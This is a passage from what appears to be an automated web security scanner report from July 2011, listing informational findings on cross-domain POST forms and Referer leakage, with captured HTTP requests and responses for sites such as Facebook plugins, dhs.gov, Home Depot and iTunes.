Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.85.31
X-Cnection: close
Date: Wed, 13 Jul 2011 00:32:02 GMT
Content-Length: 6256

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<div id="connect_widget_4e1ce782c7ac24b56399891" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You recommend this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You recommend this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends recommend.</span><span class="unlike_span hidden_elem"><a class="co
...[SNIP]...

14.4. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.91.65
X-Cnection: close
Date: Tue, 12 Jul 2011 16:35:52 GMT
Content-Length: 9659

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<input name="partner_id" value="homedepot.com" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_1" value="http://www.homedepot.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u855264_2"><input value="Sign Up" type="submit" id="u855264_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u855264_1").login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/homedepot" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203621_106485550030_3042003_q.jpg" alt="The Home Depot" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/homedepot" target="_blank"><span class="name">The Home Depot</span> on Facebook</a></div><div><div id="connect_widget_4e1c77e89de7c8d47221354" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a>
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhomedepot&width=256&colorscheme=light&show_faces=false&stream=true&header=false&height=395 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.85.59
X-Cnection: close
Date: Tue, 12 Jul 2011 16:36:05 GMT
Content-Length: 9548

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Content-Language" content="en" /><script>Cavalr
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="like_box" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u856587_2"><input value="Sign Up" type="submit" id="u856587_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance("u856587_1").login();"><b>log in</b></a> to see what your friends like.</div></div><div class="connect_widget phs pts"><div class="fan_box"><div class=""><div class="connect_top clearfix"><a href="http://www.facebook.com/homedepot" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203621_106485550030_3042003_q.jpg" alt="The Home Depot" /></a><div class="connect_action"><div class="name_block"><a href="http://www.facebook.com/homedepot" target="_blank"><span class="name">The Home Depot</span> on Facebook</a></div><div><div id="connect_widget_4e1c77f5d4b996901425190" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a cla
...[SNIP]...

14.5. http://www.youtube.com/embed/IHmPw1HsCe4 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/embed/IHmPw1HsCe4

Request 1

GET /embed/IHmPw1HsCe4 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://prod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=MszzkYLcUx8; GEO=9a1c404e06af3d5439338e99be88d9b9cwsAAAAzVVOtwdbzThyyiQ==; PREF=fv=10.3.181

Response 1

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:46:29 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 13218
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - KATANGO - Personal Crowd Control</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflo7vXAe.css">

</head>
<body
...[SNIP]...
as3-vfl7OZAr4.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "904421,903104,904426,910207", "use_fullscreen_popup": "1", "allow_embed": 1, "allow_ratings": 1, "hl": "en_US", "eurl": "http:\/\/prod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com\/", "iurl": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/hqdefault.jpg", "view_count": 211, "title": "KATANGO - Personal Crowd Control", "avg_rating": 3.22222222222, "video_id": "IHmPw1HsCe4", "length_seconds": 93, "iurlmaxres": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/maxresdefault.jpg", "enablejsapi": "0", "sk": "mj1ChkSkb3xvfEiypG0b-t_1x_aVgPhBC", "use_native_controls": false, "rel": "1", "jsapicallback": "yt.embed.onPlayerReady", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vfl9Q_Tm7.swf", "iurlsd": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflWc5qlC.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflWc5qlC.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");

yt.embed.writeEmbed();
</script>

</body>
</html>

Request 2

GET /embed/IHmPw1HsCe4 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=MszzkYLcUx8; GEO=9a1c404e06af3d5439338e99be88d9b9cwsAAAAzVVOtwdbzThyyiQ==; PREF=fv=10.3.181

Response 2

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:46:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 13144
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - KATANGO - Personal Crowd Control</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflo7vXAe.css">

</head>
<body
...[SNIP]...
as3-vfl7OZAr4.swf", "min_version": "8.0.0", "args": {"el": "embedded", "fexp": "904421,903104,904426,910207", "use_fullscreen_popup": "1", "allow_embed": 1, "allow_ratings": 1, "hl": "en_US", "eurl": "", "iurl": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/hqdefault.jpg", "view_count": 211, "title": "KATANGO - Personal Crowd Control", "avg_rating": 3.22222222222, "video_id": "IHmPw1HsCe4", "length_seconds": 93, "iurlmaxres": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/maxresdefault.jpg", "enablejsapi": "0", "sk": "mj1ChkSkb3xvfEiypG0b-t_1x_aVgPhBC", "use_native_controls": false, "rel": "1", "jsapicallback": "yt.embed.onPlayerReady", "playlist_module": "http:\/\/s.ytimg.com\/yt\/swfbin\/playlist_module-vfl9Q_Tm7.swf", "iurlsd": "http:\/\/i2.ytimg.com\/vi\/IHmPw1HsCe4\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflWc5qlC.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflWc5qlC.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");
yt.setMsg('HTML5_SUBS_TRANSCRIBED', "transcribed");

yt.embed.writeEmbed();
</script>

</body>
</html>

15. Cross-domain POST previous next
There are 2 instances of this issue:

http://www.dhs.gov/index.shtm
http://www.riusar.com/

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

15.1. http://www.dhs.gov/index.shtm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dhs.gov
Path:	/index.shtm

Issue detail

The page contains a form which POSTs data to the domain service.govdelivery.com. The form contains the following fields:

code
origin
login
emailImage

Request

GET /index.shtm HTTP/1.1
Host: www.dhs.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "155d93d7d3bad41a56e82287b5c6b82d:1309191086"
Vary: Accept-Encoding
Cache-Control: max-age=55
Date: Wed, 13 Jul 2011 00:39:33 GMT
Content-Length: 25407
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dep
...[SNIP]...
<div class="boxed">
<form action="https://service.govdelivery.com/service/multi_subscribe.html" method="POST" style="padding:18px 0 6px 6px; margin:0">
<input type="hidden" name="code" value="USDHS" />
...[SNIP]...

15.2. http://www.riusar.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.riusar.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET / HTTP/1.1
Host: www.riusar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:39 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<br />

<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

16. Cross-domain Referer leakage previous next
There are 31 instances of this issue:

http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://itunes.apple.com/us/app/katango/id447742732
http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.js
http://ucc.state.ri.us/loginsystem/login.asp
http://ucc.state.ri.us/ucc/uccmenu.asp
https://www.chase.com/ccp/index.jsp
https://www.chase.com/ccp/index.jsp
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/search
http://www.google.com/search
http://www.google.com/search
http://www.imiclk.com/cgi/r.cgi
http://www.imiclk.com/cgi/r.cgi
http://www.interactivemediaawards.com/winners/certificate.asp
http://www.jpmorgan.com/pages/jpmorgan/investbk/solutions/fixedincome/fx
http://www.lowes.com/
http://www.lowes.com/pc_Flooring_4294934373_4294937087_
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
http://www.mass.gov/
http://www.mass.gov/
http://www.mass.gov/
http://www.ox.popcap.com/delivery/afr.php
https://www.ri.gov/information/
https://www.ri.gov/search/
https://www.ri.gov/visit/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

16.1. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=homepage;ord=1294428578112.2744?

The response contains the following link to another domain:

http://r.turn.com/r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=

Request

GET /activityi;src=3076801;type=homed040;cat=homed063;u1=homepage;ord=1294428578112.2744? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 12 Jul 2011 16:35:45 GMT
Expires: Tue, 12 Jul 2011 16:35:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 480
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IMG SRC="http://ad.doubleclick.net/activity;src=3076801;type=homed040;cat=homed639;ord=1;num=1669546384?" WIDTH=1 HEIGHT=1 BORDER=0 ALT=""/><img border="0" src="http://r.turn.com/r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid=">
</body>
...[SNIP]...

16.2. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=6226655412465.334?

The response contains the following links to other domains:

http://static.2mdn.net/csi/d?s=floodlight&v=3&action=body_end&adi=spotid_3076801
http://static.2mdn.net/csi/d?s=floodlight&v=3&action=noscript_load&adi=spotid_3076801

Request

GET /activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=6226655412465.334? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 12 Jul 2011 16:46:09 GMT
Expires: Tue, 12 Jul 2011 16:46:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 1787
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><script>(function(){var e=(new Date).getTime();var f=function(a,b){var c=document.crea
...[SNIP]...
<noscript><img src="http://static.2mdn.net/csi/d?s=floodlight&v=3&action=noscript_load&adi=spotid_3076801"></noscript><img src="http://static.2mdn.net/csi/d?s=floodlight&v=3&action=body_end&adi=spotid_3076801"></body>
...[SNIP]...

16.3. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?

The response contains the following links to other domains:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=lowesz_cs=1&betq=13252=436547

Request

Response

16.4. http://itunes.apple.com/us/app/katango/id447742732 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/katango/id447742732

Issue detail

The page was loaded from a URL containing a query string:

http://itunes.apple.com/us/app/katango/id447742732?ls=1&mt=8

The response contains the following links to other domains:

http://a1.mzstatic.com/us/r1000/090/Purple/f7/0c/43/mzl.wlsmxryd.320x480-75.jpg
http://a2.mzstatic.com/us/r1000/102/Purple/2e/0e/33/mzl.xxkyinno.320x480-75.jpg
http://a2.mzstatic.com/us/r1000/112/Purple/0c/8a/06/mzl.lmolflmr.320x480-75.jpg
http://a2.mzstatic.com/us/r1000/117/Purple/6e/17/e4/mzl.wicbkpaf.320x480-75.jpg
http://a3.mzstatic.com/us/r1000/102/Purple/1e/8c/0e/mzm.rcevvdvw.175x175-75.jpg
http://a5.mzstatic.com/us/r1000/057/Purple/3b/4b/65/mzm.lbjamdek.75x75-65.jpg
http://a5.mzstatic.com/us/r1000/112/Purple/8b/95/4b/mzl.jhkdtgez.320x480-75.jpg
http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png
http://r.mzstatic.com/htmlResources/9326/web-storefront-base.cssz
http://r.mzstatic.com/htmlResources/9326/web-storefront-base.jsz
http://r.mzstatic.com/htmlResources/9326/web-storefront-preview.cssz
http://r.mzstatic.com/htmlResources/9326/web-storefront-preview.jsz
http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62
http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62
http://www.katango.com/
http://www.surveymonkey.com/s/ikatango

Request

GET /us/app/katango/id447742732?ls=1&mt=8 HTTP/1.1
Host: itunes.apple.com
Proxy-Connection: keep-alive
Referer: http://prod-apache-load-balancer-782580564.us-west-1.elb.amazonaws.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
